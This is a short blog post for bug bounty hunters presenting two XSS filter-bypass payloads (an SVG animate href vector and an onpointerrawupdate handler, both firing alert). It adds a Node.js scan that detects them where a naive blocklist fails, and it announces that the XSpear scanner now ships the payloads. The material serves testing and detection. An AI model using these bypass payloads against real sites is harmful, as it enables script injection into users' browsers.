Hi hackers and bug bounty hunters! Recently, two previously unknown XSS payloads were disclosed one after another. They are not very difficult to understand, so I'll share them briefly!
SVG Animate XSS
<svg><animate xlink:href=#xss attributeName=href dur=5s repeatCount=indefinite keytimes=0;0;1 values="https://portswigger.net?;javascript:alert(45);0" /><a id=xss><text x=20 y=20>XSS</text></a>
onpointerrawupdate event handler for XSS
<div onpointerrawupdate=alert(45)>xss</div>
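Both vectors get past filters that match known handler names or look for `javascript:` directly in an `href` attribute. The Node.js scan below is an added example, not code from the original post or from XSpear. The names `naiveHit`, `scan` and `parseAttrs` and the blocklist contents are assumptions for illustration. It flags any `on*` attribute and any `<animate>`/`<set>` element that writes `href` from a value list containing a `javascript:` URL.

```javascript
// Added example: triage scan for the two vectors above. A regex scan of
// logged or stored input, not an HTML sanitizer.

// Typical blocklist (constructed for comparison): fixed handler names and
// javascript: only where it appears directly in an href attribute.
const naiveHit = (html) =>
  /\son(click|error|load|mouseover|focus)\s*=/i.test(html) ||
  /href\s*=\s*["']?\s*javascript:/i.test(html);

// Split a start tag's attribute text into a lowercase name -> value map.
function parseAttrs(text) {
  const attrs = Object.create(null);
  const re = /([^\s"'<>\/=]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'<>]+)))?/g;
  for (const m of text.matchAll(re)) {
    attrs[m[1].toLowerCase()] = m[2] ?? m[3] ?? m[4] ?? "";
  }
  return attrs;
}

function scan(html) {
  const findings = [];
  const tagRe = /<([a-zA-Z][^\s\/>]*)((?:"[^"]*"|'[^']*'|[^>"'])*)>/g;
  for (const t of html.matchAll(tagRe)) {
    const tag = t[1].toLowerCase();
    const attrs = parseAttrs(t[2]);
    // Rule 1: every on* attribute is a handler slot, whatever the event name.
    for (const name of Object.keys(attrs)) {
      if (/^on[a-z]/.test(name)) findings.push({ tag, rule: "event-handler", attr: name });
    }
    // Rule 2: <animate>/<set> writing href with a javascript: URL in its value list.
    if (tag === "animate" || tag === "set") {
      const target = (attrs.attributename || "").toLowerCase();
      const values = [attrs.values, attrs.to, attrs.from].filter(Boolean).join(";");
      // Ignore whitespace and control characters before comparing the scheme.
      const js = values.split(";").some((v) =>
        /^javascript:/i.test(v.replace(/[\u0000-\u0020]/g, "")));
      if (/^(xlink:)?href$/.test(target) && js) {
        findings.push({ tag, rule: "animated-href", attr: target });
      }
    }
  }
  return findings;
}

// Samples: the two payloads from this post plus a constructed benign fragment.
const svgSample = '<svg><animate xlink:href=#xss attributeName=href dur=5s repeatCount=indefinite keytimes=0;0;1 values="https://portswigger.net?;javascript:alert(45);0" /><a id=xss><text x=20 y=20>XSS</text></a>';
const divSample = "<div onpointerrawupdate=alert(45)>xss</div>";
const benign = '<svg><animate attributeName=opacity values="0;1" dur=2s /><a href="https://example.com">ok</a></svg>';
for (const s of [svgSample, divSample, benign]) console.log(naiveHit(s), scan(s));
```

The constructed blocklist reports `false` for all three samples, while `scan` returns one finding for each payload and none for the benign fragment.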
Updated XSpear (1.3.3)
I added these two payloads to XSpear about two days ago, I think. Please use it after the update.
https://github.com/hahwul/XSpear/issues/49 https://github.com/hahwul/XSpear/issues/50
Once you update to 1.3.3, they are included by default : )
gem update XSpear
Reference
https://twitter.com/XssPayloads/status/1225426346366701568 https://portswigger.net/research/svg-animate-xss-vector